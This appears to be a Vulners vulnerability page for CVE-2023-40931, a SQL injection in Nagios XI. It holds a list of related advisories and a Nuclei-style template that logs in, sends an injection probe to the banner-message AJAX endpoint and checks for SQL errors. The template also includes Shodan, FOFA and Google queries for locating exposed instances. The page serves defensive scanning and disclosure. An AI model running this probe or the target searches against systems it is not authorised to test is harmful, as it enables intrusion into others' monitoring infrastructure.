| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| CVE-2023-40931 | 19 Sep 202323:15 | – | attackerkb | |
| Exploit for SQL Injection in Nagios Nagios_Xi | 4 Apr 202512:35 | – | githubexploit | |
| Exploit for SQL Injection in Nagios Nagios_Xi | 27 Apr 202401:42 | – | githubexploit | |
| The vulnerability in the Nagios XI monitoring tool’s script for nagiosxi/admin/banner_message-ajaxhelper.php allows a attacker to disclose protected information. | 25 Sep 202300:00 | – | bdu_fstec | |
| CVE-2023-40931 | 20 Sep 202314:52 | – | circl | |
| Nagios XI SQL Injection Vulnerability | 19 Sep 202300:00 | – | cnnvd | |
| CVE-2023-40931 | 19 Sep 202300:00 | – | cve | |
| CVE-2023-40931 | 19 Sep 202300:00 | – | cvelist | |
| Critical Security Vulnerabilities Uncovered in Nagios XI | 25 Sep 202305:14 | – | hivepro | |
| Nagios XI < 5.11.2 Multiple Vulnerabilities | 21 Sep 202300:00 | – | nessus |
id: CVE-2023-40931
info:
name: Nagios XI v5.11.0 - SQL Injection
author: ritikchaddha
severity: medium
description: |
A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php.
impact: |
Successful exploitation of this vulnerability allows an authenticated attackers to execute arbitrary SQL commands.
remediation: |
Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability.
reference:
- https://rootsecdev.medium.com/notes-from-the-field-exploiting-nagios-xi-sql-injection-cve-2023-40931-9d5dd6563f8c
- https://nvd.nist.gov/vuln/detail/CVE-2023-40931
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2023-40931
cwe-id: CWE-89
epss-score: 0.13484
epss-percentile: 0.95979
cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: nagios
product: nagios_xi
shodan-query: title:"Nagios XI"
fofa-query: app="nagios-xi"
google-query: intitle:"nagios xi"
tags: cve2023,cve,authenticated,nagiosxi,sqli,nagios,vuln
http:
- raw:
- |
GET /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}
- |
POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=acknowledge_banner_message&id=*
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Failed to acknowledge"
- "SQL Error"
- "right syntax to use near"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: nsp
part: body
group: 1
regex:
- "name=['\"]nsp['\"] value=['\"](.*)['\"]>"
internal: true
# digest: 4a0a00473045022040af7a8d63c0466aee4b9833a6d891f2b6e81cfa7c24df93a5db1487c0ffa8f6022100c8c48a23a18b0279d393e7895dc13ce37cba602b793fef60832d96ca10668eed:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation